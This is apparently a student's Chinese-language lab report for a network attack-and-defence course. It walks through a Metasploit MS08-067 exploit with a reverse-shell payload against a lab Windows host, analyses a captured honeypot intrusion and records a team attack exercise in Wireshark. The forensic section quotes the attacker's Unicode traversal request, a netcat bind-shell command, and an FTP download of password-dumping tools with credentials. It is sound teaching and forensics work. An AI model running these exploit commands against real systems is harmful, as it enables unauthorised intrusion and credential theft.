20252820 2025-2026-2 《网络攻防实践》实践六报告
20252820 2025-2026-2 《网络攻防实践》实践六报告
1. 实践内容
本次实践围绕 Windows 系统远程渗透攻击与取证分析展开,主要包括三部分内容。
第一部分是动手实践 Metasploit Windows attacker。实验目标是使用攻击机上的 Metasploit 框架,对 Windows 靶机的 MS08-067 漏洞实施远程渗透攻击,验证漏洞是否可被利用,并尝试获取目标主机访问权限。该部分重点在于掌握 Metasploit 的基本使用流程,包括漏洞模块选择、载荷设置、参数配置与攻击验证。
第二部分是取证分析实践,即解码一次成功的 NT 系统破解攻击。实验要求对给定日志文件中的攻击流量进行分析,结合 Wireshark 跟踪 HTTP、TCP、FTP 等数据流,梳理攻击者从漏洞探测、漏洞利用、获取权限到后续操作的完整攻击链,并回答攻击工具、入侵方式、入侵后行为、防御方法以及是否识别蜜罐等问题。
第三部分是团队对抗实践。在该实验中,攻方同学使用 Metasploit 选择合适漏洞对 Windows 靶机实施远程渗透,防守方同学使用 Wireshark 监听并分析攻击过程中产生的网络流量,从而完成一次较为完整的攻防对抗与分析过程。该部分强调攻击过程记录、相关 IP 信息整理以及抓包分析能力。
从知识层面看,本次实践涉及 Metasploit 框架使用、MS08-067 漏洞原理、Windows 远程渗透流程、蜜罐攻击取证分析、HTTP/TCP/FTP 协议流追踪、攻击痕迹识别与基础防御思路等内容。
1.1 相关知识概述
(1)Metasploit 框架简介
Metasploit 是一种常用的渗透测试框架,集成了大量漏洞利用模块、载荷模块、辅助模块和后渗透模块。实验中通常先搜索目标漏洞模块,再设置攻击参数与载荷,最后执行 exploit 完成漏洞利用。通过该工具可以快速验证系统中的已知漏洞是否可被攻击者利用。
(2)MS08-067 漏洞原理
MS08-067 是 Windows Server 服务中的一个经典高危漏洞,本质上与 RPC 请求处理过程中的缓冲区溢出问题有关。攻击者构造恶意请求后,可在未授权情况下在目标主机上执行任意代码,从而获得系统权限。该漏洞危害大、传播快,在安全实验中常被用作 Windows 远程渗透的典型案例。
(3)取证分析的基本思路
对于给定攻击日志,应从通信双方 IP、协议类型、访问顺序、关键请求内容和后续回连行为等多个角度进行分析。常见方法包括设置显示过滤条件、跟踪 HTTP/TCP 数据流、定位特征字符串、分析可疑命令与文件传输行为,最终还原攻击链。
(4)团队对抗的分析重点
团队对抗实验中,攻击方需要完整记录攻击机、靶机、漏洞模块、载荷和执行结果;防守方则需要从抓包结果中识别攻击发起时间、源目 IP、目标端口、相关协议以及典型载荷特征。通过攻防两侧相互印证,可以更加全面地理解真实网络攻击的过程。
2. 实践过程
2.1 动手实践:Metasploit Windows attacker
2.1.1 实验目标
使用 Metasploit 对 Windows 靶机上的 MS08-067 漏洞进行远程渗透攻击,获取目标主机访问权,并结合抓包工具观察攻击流量。
2.1.2 实验环境
首先分别启动攻击机与靶机,登录系统后检查各自主机的网络配置信息,以确认双方 IP 地址和所在网段是否正确。
在 Windows 靶机中使用如下命令查看网络配置:
ipconfig /all
在 Kali 攻击机中使用如下命令查看网络配置:
ifconfig
截图:Windows 靶机 IP 信息

截图:Kali 攻击机 IP 信息

2.1.3 连通性测试
先进行连通性测试,避免因网络配置问题导致后续攻击失败。可在 Kali 与靶机之间分别进行 ping 测试,判断双方是否能够互通。
ping 目标IP
截图:攻击机 ping 靶机

截图:靶机 ping 攻击机 或连通成功结果

2.1.4 启动 Metasploit 环境
在 Kali 中启动 PostgreSQL 服务并初始化 Metasploit 数据库,然后进入 msfconsole 控制台。
service postgresql start
msfdb init
msfconsole
如果普通用户权限下启动失败,可切换到 root 用户后重新执行相关命令。
截图:启动 PostgreSQL 服务

截图:初始化 msfdb 并进入 msfconsole

2.1.5 搜索并选择漏洞模块
进入 msfconsole 后,首先搜索与 MS08-067 相关的漏洞模块,然后选择合适的利用模块。
search ms08_067
use exploit/windows/smb/ms08_067_netapi
确认 Metasploit 中存在可用漏洞模块,并将当前工作环境切换到对应漏洞利用模块中。
截图:search ms08_067 结果




截图:use 模块成功

2.1.6 查看并设置 Payload
查看当前模块支持的载荷类型,并选择合适的反向连接载荷。
show payloads
set payload generic/shell_reverse_tcp
当靶机漏洞利用成功后,主动向攻击机发起一个 TCP 反向连接,从而建立远程控制通道。
截图:show payloads 结果





截图:设置 payload 成功

2.1.7 设置攻击参数并执行利用
通过 show options 查看该模块当前必须填写的参数,并设置攻击机 IP 与靶机 IP。通常其中:
LHOST:192.168.200.6RHOST:192.168.200.3
show options
set LHOST 192.168.200.6
set RHOST 192.168.200.3
show options
执行漏洞利用:
set TARGET 0
exploit
截图:show options 配置前/后

截图:设置 LHOST 与 RHOST



截图:执行 exploit

2.1.8 验证攻击结果
漏洞利用成功,kali 将返回已建立会话的信息,在实验过程中打开 Wireshark,对攻击机或防守方主机的网络接口进行抓包。重点关注攻击过程中的 SMB/TCP 通信、源目 IP 变化以及攻击建立后的会话流量。
截图:Wireshark 抓包界面及攻击相关数据流


2.2 取证分析实践:解码一次成功的 NT 系统破解攻击
2.2.1 实验目标
对给定日志文件中的攻击流量进行分析,提取攻击全过程,回答攻击者使用的工具、入侵路径、控制系统后的行为、防御方法以及攻击者是否识别出蜜罐等问题。
2.2.2 导入日志
首先下载实验提供的日志文件,在 Kali 中使用 Wireshark 打开。
截图:日志文件导入界面

2.2.3 基于 HTTP 流量分析攻击行为
可以使用如下显示过滤条件,筛选攻击机与靶机之间的 HTTP 流量:
ip.addr == 212.116.251.162 && ip.addr == 172.16.1.106 && http
使用 “Follow HTTP Stream” 跟踪 HTTP 数据流。
截图:HTTP 过滤结果


截图:Follow HTTP Stream 分析结果


看到cmd1.exe ?/c+nc+ -l -p 6969 -e+cmd1.exe HTTP/1.1这一行,证明端口为6969
2.2.4 基于 TCP 流量继续跟踪攻击链
在 HTTP 流量之外,还需要对关键 TCP 会话进行逐条跟踪。
截图:跟踪 eq 7


找到这一行GET /guest/default asp/..%C0%AF../..%C0%AF../..%C0%AF../boot .ini HTTP/1.1,判断存在Unicode编码漏洞攻击。
截图:跟踪 eq 11


找到这一行ADMROXYOURWORLD,判断此次攻击与 rain forest puppy 编写的 msadc(2).pl 一类 MDAC/RDS 漏洞利用代码有关,攻击者已成功触发目标主机上的命令执行并获得 shell。
截图:跟踪 eq 106



攻击者创建了ftpcom脚本,并使用ftp连接http://www.nether.net/ ,然后以johna2k为用户名,haxedj00为密码下载 nc.exe、pdump.exe和samdump.dll。
截图:跟踪 eq 178


攻击者向rfp.txt中写入了 best honeypot i've seen till now 。
2.2.5 结合 msadc 特征进一步分析
在日志分析中,通过 URI 特征进行定向筛选:
http.request.uri contains "msadc"
截图:msadc 过滤结果

2.2.6 FTP 行为分析
在日志分析中,通过 ftp字段继续筛选:
截图:FTP 过滤结果

2.2.7 问题分析与回答
(1)攻击者使用了什么破解工具进行攻击?


攻击者利用Unicode漏洞,使用了Unicode攻击。攻击者使用了 rain forest puppy 编写的 msadc(2).pl 漏洞利用脚本,对 IIS/MDAC RDS 漏洞发起远程渗透攻击。
(2)攻击者如何使用这个破解工具进入并控制了系统?
攻击者先通过构造恶意 Web 请求利用目标主机的 Unicode 编码绕过和 MDAC RDS 漏洞,进而执行系统命令并获得远程 shell 控制权。
(3)攻击者获得系统访问权限后做了什么?



攻击者创建了ftpcom脚本,并使用ftp连接http://www.nether.net/ ,然后以johna2k为用户名,haxedj00为密码下载 nc.exe、pdump.exe和samdump.dll。
(4)我们如何防止这样的攻击?
可以进行补丁更新修复已知漏洞、关闭一些不必要的服务、使用 IDS/IPS、防火墙隔离、使用强口令策略定期更换口令、使用复杂度高的密码。
(5)攻击者是否察觉目标是一台蜜罐主机?为什么?

攻击者向rfp.txt中写入了 best honeypot i've seen till now 。
2.3 团队对抗实践:Windows 系统远程渗透攻击与分析
2.3.1 实验目标
由攻方同学 192.168.1.104 对防守方 192.168.1.111 靶机实施远程渗透;由防守方同学使用 Wireshark 监听并分析攻击流量,提取攻击方信息、攻击方式以及网络证据。
2.3.2 攻方实施远程渗透攻击
攻击方在 Kali 中打开 msfconsole,调用 MS08-067 漏洞模块,选择合适 Payload,设置本机与目标主机地址后执行漏洞利用。其操作思路与 2.1 节中的个人实验基本一致。
截图:双方连通性测试

命令如下:
msfconsole
use exploit/windows/smb/ms08_067_netapi
show payloads
set payload generic/shell_reverse_tcp
set LHOST 192.168.1.104
set RHOST 192.168.1.111
show options
exploit
攻击成功后,进一步执行 mkdir、cd 等命令验证控制权,确认相应操作痕迹是否真实存在。
截图:攻击方开始攻击




截图:靶机侧验证痕迹:新建20252820文件夹并写入txt文件

2.3.3 防守方抓包与过程分析
防守方在实验期间使用 Wireshark 对本机或指定网卡进行抓包,重点观察攻击发起时的网络通信过程,包括源 IP、目标 IP、通信协议、目标端口以及攻击成功后的会话流量。
- 攻击流量由192.168.1.104发起;
- 攻击目标是192.168.1.111;
- 主要经过了 TCP/445(SMB) 和 TCP/4444(反弹 shell),前面还能看到少量 ICMP 探测流量。更具体地说:SMB 漏洞利用阶段:TCP 445。获取控制权后反连阶段:TCP 4444。前期连通性探测:ICMP
- 攻击机 192.168.1.104 先对目标 192.168.1.111:445 建立大量 SMB 会话,明显符合漏洞利用特征;紧接着目标主机 192.168.1.111:1045 主动连回攻击机 192.168.1.104:4444,这就是非常典型的反向 shell / 反弹连接痕迹。
- 反连成功后,流量里直接出现了 Windows 命令行 banner 和命令执行内容,说明攻击者已经拿到了 shell,并在继续操作目标主机。
截图:Wireshark 抓包界面
攻击是由 192.168.1.104 发起的。攻击目标是 192.168.1.111。

协议:使用了TCP/445(SMB) 和 TCP/4444(反弹 shell),前面还能看到少量 ICMP 探测流量。

攻击机 192.168.1.104 先对目标 192.168.1.111:445 建立大量 SMB 会话,明显符合漏洞利用特征;
紧接着目标主机 192.168.1.111:1045 主动连回攻击机 192.168.1.104:4444,这就是非常典型的反向 shell / 反弹连接痕迹。

4763:返回 Microsoft Windows XP [Version 5.1.2600],证明:攻击者拿到了 Windows 命令 shell。

5034:攻击者发送 mkdir 20252820

follow tcpstream,可以看到攻击者发送 echo 'hello' > 20252820.txt

3. 学习中遇到的问题及解决
-
问题1: 攻击机与靶机无法互通,导致漏洞利用失败。
解决方案: 检查虚拟机网卡模式、网关配置、是否处于同一网段,并通过ping测试逐步定位问题。。 -
问题2: Metasploit 启动失败或数据库初始化失败。
解决方案: 先启动 PostgreSQL 服务,再执行msfdb init,必要时切换到 root 用户执行命令。 -
问题3: 攻击执行后无回连或利用失败。
解决方案: 检查LHOST与RHOST是否填写正确,确认 Payload 选择是否合理,并核对靶机系统版本与漏洞模块是否匹配。 -
问题4: Wireshark 抓包结果过多,难以定位关键流量。
解决方案: 使用显示过滤器按 IP、协议和关键字段进行筛选,再结合 Follow HTTP Stream / Follow TCP Stream 逐步还原攻击过程。
4. 实践总结
通过本次实践,我对 Windows 系统远程渗透攻击和网络取证分析有了更直观的认识。实验一让我熟悉了 Metasploit 的基本使用流程,理解了从漏洞搜索、模块选择、Payload 设置到成功获取会话的完整利用过程;实验二则让我学会了利用 Wireshark 对日志流量进行分析,能够从协议行为和关键字符串中逐步还原攻击者的入侵路径;实验三通过与同学配合完成攻防对抗,使我进一步理解了攻击过程与抓包分析之间的对应关系。
在实验过程中,我不仅掌握了 MS08-067 等典型漏洞的利用思路,也认识到系统补丁更新、网络隔离、服务最小化、流量监控和日志审计等安全防护措施的重要性。本次实践将漏洞利用、流量分析和团队对抗结合起来,对提升我的网络攻防实践能力具有很大帮助。

浙公网安备 33010602011771号